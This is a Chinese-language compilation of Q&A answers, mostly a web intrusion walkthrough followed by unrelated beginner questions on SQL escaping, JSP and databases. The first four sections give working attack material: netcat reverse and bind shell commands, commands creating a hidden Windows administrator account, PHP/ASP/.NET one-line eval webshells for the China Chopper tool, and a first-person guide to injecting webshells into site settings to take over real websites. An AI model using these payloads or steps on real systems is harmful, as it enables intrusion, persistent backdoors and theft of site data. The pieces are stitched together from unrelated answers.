⑴ web渗透是什么
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
⑵ 中国菜刀的功能介绍:
只要支持动态脚本的网站,都可以用中国菜刀来进行管理!主要功能有:文件管理,虚拟终端,数据库管理。
UINCODE方式编译,支持多国语言输入显示。
一、EVAL客户端部分
1)要了解的
服务端只需要简单的一行代码,即可用此程序实现常用的管理功能。
支持的服务端脚本:PHP, ASP,NET。
在服务端运行的代码如下:
PHP: <?php @eval($_POST['pass']);?>
ASP: <%eval request(pass)%>
.NET: <%@ Page Language=Jscript%><%eval(Request.Item[pass],unsafe);%>
(注意: .NET要单独一个文件或此文件也是Jscript语言)
2)怎么用
在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码,保存后即可使用文件管理,虚拟终端,数据库管理三大块功能。要是其它都没错误,那么可能就是你把语言编码选错了。
1. 文件管理:[特色]缓存下载目录,并支持离线查看缓存目录;
2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法)
3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS
以入支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看)
注意:由于服务器的安全设置,某些功能可能不能正常使用。
3) 关于配置信息怎么填?
A) 数据库方面:
PHP脚本:
<T>类型</T> 类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种
<H>主机地址<H> 主机地址可为机器名或IP地址,如localhost
<U>数据库用户</U> 连接数据库的用户名,如root
<P>数据库密码</P> 连接数据库的密码,如123455
ASP和.NET脚本:
<T>类型</T> 类型只能填ADO
<C>ADO配置信息</C>
ADO连接各种数据库的方式不一样。如MSSQL的配置信息为
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456
B) 其它方面:
添加额外附加提交的数据:应付这种情况:if ($_POST['action']=='test'){@eval($_POST['pass']);}
<O>action=test</O>
提交功能前先POST额外的数据包:会话期间只提交一次。
<DATA>uid=user1&pwd=123456</DATA>
二、网站蜘蛛
织出一张网站的目录结构。
下载的列表文件存在桌面,右键菜单/载入URL列表即可以根据地址得到目录结构。
三、定时提醒
当闹钟事使吧, 周期:每月/每周/每日/只一次。
四、快速启动
一些常用的快捷方式放在这里,可以指定用户身份运行程序。这部分数据是以加密存储的。
五、浏览器
地址栏输入HELP,更多精彩后续加入。
六、其它部分
等待加入。
附带工具
update.exe是wsc.exe的数据库wscdb迁移到菜刀的一个小工具。
把wscdb文件整到当前目录,运行update.exe得到新的数据库文件cai.mdb
把菜刀的数据库db.mdb替换掉即可。
⑶ 上传一句话木马后,数据库备份成功,之后用中国菜刀连接成功,想传大马,怎么弄。
菜刀里面有上传功能的 ,直接把你的大马上传就可以了
⑷ 一句话木马怎么插和我插了一句话木马之后那个打开网址然后上传代码的网址是多少那些教程里没有说那个地址
一句话木马插入方法:第一种:先判断数据库是asp或其他格式,若为asp格式,可通过留言本向数据库插入一句话代码,插入后,用中国菜刀连接留言本数据库地址(数据库地址可以通过暴库爆出路径,暴不出路径,就用工具强行扫描,看是否能扫到数据库地址)就得到webshell了。第二种:进入网站后台,然后修改网站名,把网站名修改成一句话木马代码,记住,要闭合插入一句话,即
"%><%evalrequest("这里换成你喜欢设的密码"%><%s="'闭合的一句话木马代码
<%evalrequest("这里换成你喜欢设的密码"%>'未闭合的一句话木马代码有一次,我进了一个网站后台,修改网站名时,没有闭合插入一句话木马代码,致使后台出现了403错误,无法打开,白浪费了一个网站。闭合插入并保存后,用中国菜刀连接网站配置文件(配置文件路径可以通过插入未闭合的一句话木马代码,不保存,点击后台别的位置,会出现错误提示,下面的路径就是网站配置文件的路径),因为网站名等信息在网站的配置文件中,就要连接配置文件,成功后,你就得到了网站webshell了。
总之,我是这样拿站的,希望这些方法对你有用。
⑸ 不能写入数据库
$sql="INSERT INTO message (title,name,content) VALUES ('".$tltle."','".$name."','".$content."')";
这句最好在变量两边加上addslashes,这样可以把一些特殊字符进行转义,不然你的数据不能正常入库
$sql="INSERT INTO message (title,name,content) VALUES ('".addslashes($tltle)."','".addslashes($name)."','".addslashes($content)."')";
⑹ JSP数据库怎么在菜刀一句话里面连接啊我想看里面的数据用户表和密码表
你是需要在一个新的页面看到你的用户表和密码表呢
还是在本页面上看到你的想要的数据
如果是新的页面就只需要用<a href=" 来个servlet的连接地址">需要连接的字</a>
然后在servlet里面返回你所需要的数据就好了
⑺ 前台 后台 服务器 操作系统 数据库之间的关系
首先需要重组下顺序:前台,后台,数据库|操作系统,服务器 这样以“|”为分隔符将其分为两部分比较好理解。
前台:就是面向用户的,用户利用这个“前台”来查询需要的信息,他们只有“读”权限。就是说在前台里面他们能做的只是“看”,而不能改、删、 加等操作;
后台:就是面向管理员的,在“后台”里面管理员拥有所有权限,他有“写”权限,比如,添加信息(前台用户所能查看到的东西,就是你这个管理员去加的,要不他们查什么呢?呵呵),删除信息,修改信息,还有其他一些管理权限等,这个要在你的系统制作的时候包括了,当然,他也有“读”权限,这个是肯定的了。
数据库:就是保存你的这些所有信息的一个容器,你添加、修改的信息都被放在这里面,用户要查询的信息也是从这个里面来调用的。
至于操作系统跟服务器,那就是你的这个程序运行的一个环境了。举个简单的例子,比如:你要切菜,那么,菜刀就相当于操作系统,菜板就是服务器了,这就是一个环境。
补充回答:
1。是的,数据库是放在服务器上的。
2。操作系统不分前台和服务器,甚至这种说法根本就没有什么意义
操作系统就是我们所说的,winxp、win2000这个样子;服务器其实就是一台电脑,跟普通的电脑没有差别,只是它的配置可能稍好一点,就这么理解就行了。
假如说,现在你这个物流查询系统已经做好了,那么你就需要把它放在服务器上了,而这个服务器(网站空间)需要你去买,而买下来以后,你就等于同时拥有的服务器(网站空间)跟操作系统,因为你买服务器(网站空间)的时候已经装好了操作系统的,所以这个你就不需要去操心了。
而你说的前台、后台、数据库,是属于你这个物流查询系统的,它不属于操作系统,也不属于服务器,而只是放在了服务器上,利用操作系统这个平台去运行它。这样应该清楚了吧?
多看一些这方面的资料,慢慢就会理解的,没有你想象的那么复杂。
同时,严重鄙视一下“来自建站之家”,你的行为让我感到很不舒服!!
⑻ 用java做一个系统,使用人次超过500人,请问哪位高手能告诉我该用哪个数据库,及用这个数据库的优势。
Microsoft SQL Server 2000 能提供超大型系统所需的数据库服务。大型服务器可能有成千上万的用户同时连接到 SQL Server 2000 实例。SQL Server 2000 为这些环境提供了全面的保护,具有防止问题发生的安全措施,例如,可以防止多个用户试图同时更新相同的数据。SQL Server 2000 还在多个用户之间有效地分配可用资源,比如内存、网络带宽和磁盘 I/O